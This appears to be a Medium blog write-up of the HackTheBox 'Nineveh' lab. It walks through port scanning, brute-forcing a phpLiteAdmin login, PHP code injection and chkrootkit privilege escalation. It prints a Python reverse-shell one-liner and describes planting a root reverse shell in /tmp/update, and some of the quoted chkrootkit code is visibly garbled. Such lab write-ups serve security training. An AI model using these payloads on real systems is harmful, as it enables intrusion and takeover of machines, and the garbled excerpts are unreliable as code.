HackTheBox — Nineveh


Nmap 7.80 scan initiated Thu Sep 17 14:33:38 2020 as: nmap -sC -sV -A -oN initial
Nmap scan report for
Host is up (0.19s latency).
Not shown: 998 filtered ports
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1

Scanning reveals 2 ports running . HTTP on 80 and HTTPS on 443 .

Add nineveh.htb to hosts file.

Using GoBuster , we find a directory called /db

Heading over to https://nineveh.htb/db.index.php gives us

phpliteadmin is a web portal to manage sql databases. Running hydra on this form gave us admin:password123

Login into phpliteadmin . There’s a database called test in /var/tmp/test and has no tables. Run searchsploit on phpliteadmin.

PHPLiteAdmin 1.9.3 — Remote PHP Code Injection

Since we have logged into phpliteadmin as admin , we can rename the database to .php extension.
Put some php code in the text fields of a table and execute it in the browser.
We need to save the database as ninevehNotes.php as the server checks for the field “ninevehNotes”.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Got a shell @www-data

Writing procmon.sh which is a neat process monitoring script . It does not monitor everything running on the system as pspy would but only new processes that are started while the shell script is run .

old_process=$(ps -eo user,command)
while true
new_process=$(ps -eo user,command)
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
sleep 1

We see a binary called vulnScan.sh that is being run . Hopefully by root :)


/usr/bin/chkrootkit > /report/report-`date +%y-%m-%d:%H:%M`.txt
chown amrois:amrois /report/report-`date +%y-%m-%d:%H:%M`.txt

chkrootkit is a tool for checking rootkits on a system .It has a flaw where we can write a file called update in ./tmp directory .

We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).

The vulnerability is located in the function slapper() in the
shellscript chkrootkit:

slapper (){         
SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "

if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1
[ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
$egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
tr -d :`
for i in ${SLAPPER_FILES}; do
if [ -f ${i} ]; then
file_port=$file_port $i
if [ ${STATUS} -eq 1 ] ;then
echo "Warning: Possible Slapper Worm installed ($file_port)"
if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
return ${NOT_INFECTED}

The line ‘file_port=$file_port $i’ will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running on (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.

- Put an executable file named ‘update’ with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

Write a reverse shell to /tmp/update and wait for reverse shell as root.
chkrootkit is mostly always run as root.

We get a reverse shell as root . Voila! We can grab both the root and user flags. Direct PrivEsc to root!

However , the intended way of doing this is through the user amrois .

Our nmap scan didnt give us ssh was running but ps -ef | grep sshd gave results on the system. The port was being filtered , IPtables rules .

Here’s the knockd configuration file(read access only on root):

Port knocking .

Heading over to https://nineveh.htb/secure_notes
We get an image nineveh.png
Running binwalk on this image

Atfer extracting the folder we get the public and private ssh keys for the user amrois.

ssh is however filtered . It has a port knocking service running. We need to send tcp syn packets on the specified ports to open the ssh port.

Check out the /var/mail directory , we get knock codes 571, 290, 911.

Use nmap to send syn packets to these ports .

for i in 571 290 911; do nmap -Pn -p $i --host_timeout 201 --max-retries 0 nineveh.htb; done 

After successfully port knocking , we have ssh open. Use keys from amrois to ssh into the box and get the user flag.

Use the previous chkrootkit exploit to get root access. ;)




I enjoy developing web apps . I'm passionate about cybersecurity.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Recognize text on an image in Flutter

Daily #1: Project Revamp — Skincare Interaction Checker

Point cloud rendering

[057] LeetCode 121 演算法【Best Time to Buy and Sell Stock】 股票機器人

Intro to GraphQL ❤️

Understanding Swarm’s bandwidth incentives

Manual SQL Injection Exploitation | Burp Suite | Game Zone |

Setting up a scheduled docker run on AWS

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rayaan Hussain

Rayaan Hussain

I enjoy developing web apps . I'm passionate about cybersecurity.

More from Medium

MySQL community audit logging

DiceCTF 2022 — write-up

Three Key Ransomware Trends in 2022: RaaS, Multiple Extortion, and IABs

SMB Relay Attack